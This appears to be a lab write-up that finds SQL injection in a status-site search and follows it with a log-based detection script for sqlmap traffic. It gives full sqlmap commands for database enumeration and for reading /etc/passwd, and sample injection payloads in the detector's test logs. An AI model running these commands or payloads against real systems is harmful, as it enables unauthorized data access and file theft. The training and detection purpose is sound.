## `status.inlanefreight.local`

- nothing here

![[images/Pasted image 20260628153106.png]]

- hit search

![[images/Pasted image 20260628211142.png]]

- `request:response` in Burp

![[images/Pasted image 20260628211158.png]]

- run `sqlmap`, as this looks like a likely SQLi

![[images/Pasted image 20260628211426.png]]

- enumerate DBs and current user

```bash
sqlmap --batch -r status.inlanefreight.req --dbms=mysql --technique=BEU --risk=3 --level=5 --dbs --current-db --is-dba --banner
```

![[images/Pasted image 20260629203050.png]]

- `status` is a non-default DB; let's enumerate its tables

![[images/Pasted image 20260629203205.png]]

- `users` table

![[images/Pasted image 20260629203637.png]]

- nothing in `company` table
- unable to read `files`

```bash
sqlmap --batch -r status.inlanefreight.req --dbms=mysql --technique=BEU --risk=3 --level=5 --file-read=/etc/passwd
sqlmap --batch -r status.inlanefreight.req --dbms=mysql --technique=BEU --risk=3 --level=5 --file-read=/proc/version
```

![[images/Pasted image 20260629204112.png]]
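Detection view of the runs above, as an added example that is not part of the original notes: because `-r` replays the headers of the captured Burp request, the User-Agent will not identify sqlmap, so this matches on payload shape for the `BEU` techniques and for `--file-read` (MySQL `LOAD_FILE`). Assumptions: the search parameter travels in the query string, the server writes combined-format access logs, and the parameter name `q`, addresses and log lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# One signature per sqlmap technique in --technique=BEU, plus MySQL file reads.
SIGNATURES = {
    "boolean": re.compile(r"\b(?:AND|OR)\s+(?:NOT\s+)?\d+\s*=\s*\d+", re.I),
    "error": re.compile(r"\b(?:EXTRACTVALUE|UPDATEXML|GTID_SUBSET)\s*\(", re.I),
    "union": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "file_read": re.compile(r"\bLOAD_FILE\s*\(", re.I),
}
# Combined log format: client, ident, user, [timestamp], "METHOD target PROTO"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*"')

def classify(target):
    """Names of the signatures that match a URL-decoded request target."""
    decoded = unquote_plus(unquote_plus(target))  # tolerate double encoding
    return {name for name, rx in SIGNATURES.items() if rx.search(decoded)}

def summarize(lines, min_hits=3):
    """Per client: matching-request count and techniques seen, if >= min_hits."""
    seen = defaultdict(lambda: {"count": 0, "techniques": set()})
    for line in lines:
        m = LOG_RE.match(line)
        found = classify(m.group(2)) if m else set()
        if found:
            seen[m.group(1)]["count"] += 1
            seen[m.group(1)]["techniques"] |= found
    return {ip: v for ip, v in seen.items() if v["count"] >= min_hits}

# Constructed sample log lines (hypothetical parameter `q`, made-up addresses).
_TS = "- - [29/Jun/2026:20:30:01 +0000]"
_END = 'HTTP/1.1" 200 512 "-" "Mozilla/5.0"'
SAMPLE = [
    f'10.10.14.5 {_TS} "GET /?q=test {_END}',
    f'10.10.14.5 {_TS} "GET /?q=test%27%20AND%204821%3D4821--%20- {_END}',
    f'10.10.14.5 {_TS} "GET /?q=test%27%20AND%20EXTRACTVALUE(1,1)--%20- {_END}',
    f'10.10.14.5 {_TS} "GET /?q=test%27%20UNION%20ALL%20SELECT%20NULL--%20- {_END}',
    f'10.10.14.5 {_TS} "GET /?q=t%27%20UNION%20SELECT%20LOAD_FILE(%27/etc/passwd%27) {_END}',
    f'192.0.2.10 {_TS} "GET /?q=salt+and+pepper {_END}',
]

if __name__ == "__main__":
    for ip, info in summarize(SAMPLE).items():
        print(ip, info["count"], sorted(info["techniques"]))
```

A `--level=5 --risk=3` run sends a large number of requests, so the `min_hits` threshold can be raised well above the default here without missing it.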